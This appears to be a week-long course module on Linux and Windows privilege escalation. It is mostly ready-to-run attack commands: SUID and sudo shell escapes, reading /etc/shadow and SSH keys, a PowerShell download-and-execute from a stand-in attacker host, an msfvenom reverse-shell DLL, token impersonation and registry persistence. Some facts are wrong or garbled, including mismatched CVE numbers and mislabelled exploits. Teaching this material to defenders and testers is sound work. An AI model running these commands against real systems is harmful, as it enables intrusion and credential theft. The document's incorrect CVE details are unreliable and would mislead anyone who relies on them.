Week 9: Privilege Escalation
MITRE ATT&CK: Tactic — TA0004 (Privilege Escalation), Techniques — T1068 (Exploitation for Privilege Escalation), T1548 (Abuse Elevation Control Mechanism)
Real-World Attack Scenario: The Stuxnet Worm's Privilege Escalation
Stuxnet (2010) was a sophisticated worm targeting Iran's nuclear program. Its privilege escalation was legendary:
- Initial Access: Used four different zero-day exploits to get initial foothold
- Privilege Escalation to SYSTEM:
- Exploited Windows Task Scheduler (CVE-2010-0568) to gain system privileges
- Also exploited Print Spooler service (CVE-2010-2729) and .lnk vulnerability
- Kernel-Level Persistence: Modified kernel driver files to hide its presence
- ** Siemens PLC Targeting**: Only activated centrifuge-specific code when it detected Siemens S7-300 PLCs
- Evasion: Used stolen certificates from Realtek and JMicron to sign its malware
Key privilege escalation techniques that work in 2024:
Linux:
- SUID binaries with known exploits (GTFOBins)
- Sudo version exploits (CVE-2019-14287)
- Kernel exploits (DirtyPipe, OverlayFS)
- Cron job misconfigurations
- Docker group membership
Windows:
- SeImpersonatePrivilege abuse (PrintSpoofer, SweetPotato)
- Unquoted service paths
- AlwaysInstallElevated registry
- DLL hijacking
- Token manipulation
Why this week matters: Initial access is only half the battle. Getting root/SYSTEM access requires understanding how OS privilege models work and finding the misconfiguration that breaks them. Most real-world breaches involve some form of privilege escalation.
Objectives
- Master Linux privilege escalation (SUID, sudo, kernel exploits)
- Learn Windows privilege escalation (token manipulation, DLL hijacking, service misconfigs)
- Identify privilege escalation vectors
- Escalate from low-level user to root/admin
Linux Privilege Escalation
Initial Enumeration Script
bash
# LinPEAS (Recommended)
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# LinEnum (Classic)
# Upload and run
./LinEnum.sh -s -k password -r report.txt
# Manual checks (run these first)
id
whoami
sudo -l
cat /etc/passwd
cat /etc/shadow 2>/dev/null # Usually no access
ls -la /home/*/
history
envSUID/SGID Exploitation
bash
# Find SUID files
find / -perm -4000 -type f 2>/dev/null
find / -uid 0 -perm -4000 2>/dev/null # Root-owned SUID
# Common SUID binaries that can be exploited:
# nmap (older versions with interactive mode)
nmap --interactive
nmap> !sh
# find
find . -exec /bin/bash -p \; -quit
# vim
vim -c ':!/bin/sh'
# less/more
less /etc/passwd
!/bin/sh
# awk
awk 'BEGIN {system("/bin/sh")}'
# man
man passwd
!/bin/sh
# python/perl/ruby/php
python3 -c 'import os; os.system("/bin/bash")'
perl -e 'exec "/bin/bash";'
ruby -e 'exec "/bin/bash"'
php -r 'exec("/bin/bash");'
# cp/mv (overwrite files like /etc/shadow or /etc/passwd)
# Custom SUID binaries
strings /usr/bin/suid_binary
ldd /usr/bin/suid_binarySudo Exploitation
bash
# What can I run as sudo?
sudo -l
# Known sudo exploits:
# sudo < 1.8.28 - CVE-2019-14287
# sudo -u#-1 command (run as UID -1 = root)
# nmap sudo
sudo nmap --interactive
nmap> !sh
# apache2 (might run as root)
sudo apache2 -f /etc/shadow
# (won't work directly, but check)
# awk/perl/python/ruby
sudo awk 'BEGIN {system("/bin/bash")}'
sudo perl -e 'exec "/bin/bash";'
# vim/less/more
sudo vim
:set shell=/bin/bash
:shell
# git
sudo git help config
!/bin/bash
# pico/nano (editor with shell escape)
sudo pico
^R^X
/bin/sh^J
# Find GTFOBins: https://gtfobins.github.io/Kernel Exploits
bash
# Check kernel version
uname -a
cat /etc/issue
cat /etc/*release*
# Search exploit db
searchsploit "Linux Kernel"
searchsploit "Ubuntu 16.04"
# Common kernel exploits:
# DirtyPipe (CVE-2022-0847) - Linux 5.8-5.16
# Use: https://github.com/AlexisAhmed/DirtyPipe.git
#脏管道 (Dirty COW) CVE-2016-5195
# Older kernels
# OverlayFS CVE-2023-0179
# privilege.c - classic
# linux-exploit-suggester.plAutomated Tools
bash
# linux-exploit-suggester
./linux-exploit-suggester.pl -k 4.4.0
./linux-exploit-suggester.pl --uname "4.4.0-21-generic"
# linux-exploit-suggester-2
./les2.sh
# Check security patches
cat /proc/version
apt list --installed 2>/dev/null | grep -i patchOther Vectors
bash
# Cron jobs
cat /etc/crontab
ls -la /var/spool/cron/
ls -la /etc/cron.d/
#Writable scripts run as root
find /etc/cron.d/ -writable
# NFS no_root_squash
cat /etc/exports
# If /tmp has no_root_squash, mount and create SUID
# sudoers misconfigs
cat /etc/sudoers
visudo
# Credential hunting
cat /etc/fstab
mount
df -h
cat /etc/hosts
# SSH keys
ls -la ~/.ssh/
cat ~/.ssh/authorized_keys
cat ~/.ssh/id_rsa 2>/dev/null
cat ~/.ssh/id_dsa 2>/dev/null
# Config files with passwords
grep -r "password" /etc/*.conf 2>/dev/null
cat /var/www/html/config.php 2>/dev/null
cat /var/log/*.log 2>/dev/null
# Docker group
groups
# If user in docker group, can mount host filesystem
docker run -v /:/mnt -it alpine chroot /mnt shWindows Privilege Escalation
Initial Enumeration
powershell
# System info
systeminfo
hostname
echo %username%
# Environment
set
Get-ChildItem Env:
# Patch level
wmic qfe
# Or
systeminfo | findstr /i "kb"
# User info
whoami /all
net user
net user <username>
# Privileges
whoami /priv
# Running services
net start
sc query
tasklist /svc
# Programs
wmic product get name,versionAutomated Enumeration
powershell
# WinPEAS (Recommended)
# Download and run
.\winPEASany.exe quiet fast
# Seatbelt
.\Seatbelt.exe -group=user
# PowerUp
powershell -ExecutionPolicy Bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER/ PowerUp.ps1'); Invoke-AllChecks"
# SharpUp
.\SharpUp.exe auditService Exploits
powershell
# Check service permissions
.\accesschk.exe -uwcqv "Authenticated Users" *
.\accesschk.exe -uwcqv "Users" *
# Vulnerable service configurations:
# - Everyone can stop/start
# - Can modify binary path
# - Can modify registry
# Check for unquoted service paths
wmic service get name,displayname,pathname,startmode
# If path has spaces and no quotes, try DLL hijacking
# Modify service to execute payload
sc config <service> binpath= "C:\path\to\evil.exe"
net stop <service> && net start <service>
# Or use Metasploit
use exploit/windows/local/service_permissionsRegistry Exploits
powershell
# AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# If enabled, can create malicious MSI that runs as SYSTEM
# Autorun entries
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
# If writable, add malicious entryToken Manipulation
powershell
# SeImpersonatePrivilege (most common!)
whoami /priv
# If you have SeImpersonatePrivilege, use potato家族
# RottenPotato / JuicyPotato (pre-Windows 1803)
# PrintSpoofer (Windows 10/2019)
# SweetPotato (all-in-one)
#alos Toasted
# Token stealing via Meterpreter
getsystem
# Or manual:
use incognito
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"
# Potato variants:
# 1. JuicyPotato (older)
juicypotato.exe -l 1337 -p C:\windows\system32\cmd.exe -a "/c whoami"
# 2. PrintSpoofer (newer)
printspoofer.exe -c "whoami"
# 3. SweetPotato
sweetpotato.exe -p C:\windows\system32\cmd.exe -a "/c whoami"DLL Hijacking
powershell
# Find DLLs loaded with missing paths
# Process Monitor from Sysinternals
# Look for: NAME_NOT_FOUND, PATH_NOT_FOUND
# Common locations:
# System32
# Windows\SysWOW64 (32-bit on 64-bit)
# Application directory
# Create malicious DLL
# msfvenom
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f dll > evil.dll
# Place in vulnerable path
copy evil.dll C:\path\to\missing\dll\evil.dllStartup Applications
powershell
# Check if startup folder is writable
dir "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
icacls "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
# Add malicious shortcut
# Or via registry
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Evil" /t REG_SZ /d "C:\temp\evil.exe"Kernel Exploits (Last Resort)
powershell
# Check patch level
systeminfo | findstr /i "KB"
# Search exploits
# https://github.com/SecWiki/windows-kernel-exploits
# Search for: MS16-032, MS15-051, CVE-xxxx-xxxx
# Potato variants often work better than kernel exploits
# Only use kernel exploits as last resort - can crash systemPractical Scripts
Linux Escalation Checker
bash
#!/bin/bash
# Basic Linux priv-esc checker
echo "=== SUID Files ==="
find / -perm -4000 -type f 2>/dev/null | head -20
echo "=== Sudo Version ==="
sudo -V | head -1
echo "=== Sudo Permissions ==="
sudo -l 2>/dev/null
echo "=== Cron Jobs ==="
cat /etc/crontab
echo "=== Writable /etc ==="
[ -w /etc/passwd ] && echo "WORLD WRITABLE: /etc/passwd"
[ -w /etc/shadow ] && echo "WORLD WRITABLE: /etc/shadow"
echo "=== Kernel Version ==="
uname -aWindows Escalation Checker
powershell
# PowerShell one-liners
whoami /priv
Get-Service | Where-Object {$_.StartType -eq 'Automatic' -and $_.Status -eq 'Running'}
Get-Acl C:\Windows\System32\config\SAM | Format-List
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunPractice Labs
Lab 1: Linux SUID Exploit
bash
# On Metasploitable or custom VM
# Find SUID binary
find / -perm -4000 2>/dev/null
# Find GTFOBin for that binary
# https://gtfobins.github.io/
# ExploitLab 2: Windows Token Impersonation
bash
# Get initial meterpreter shell on Windows
# Check privileges
getprivs
# Look for SeImpersonatePrivilege
# Use incognito
use incognito
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"
# Or use potato
upload JuicyPotato.exe
execute -cH -f JuicyPotato.exe -a "-l 1337 -p cmd.exe -a /c whoami"Key Takeaways
- Enumeration first — scripts like linpeas/winpeas find 80% of vulns
- SUID/Sudo — check GTFOBins, it's your best friend
- Windows tokens — SeImpersonatePrivilege = SYSTEM via potato variants
- Kernel exploits — last resort, can crash systems
- Automated + manual — run tools first, then investigate manually
Next Week Preview
Week 10 covers Active Directory — the backbone of enterprise networks. You'll learn AD attacks, Kerberos abuse, BloodHound, and domain persistence techniques.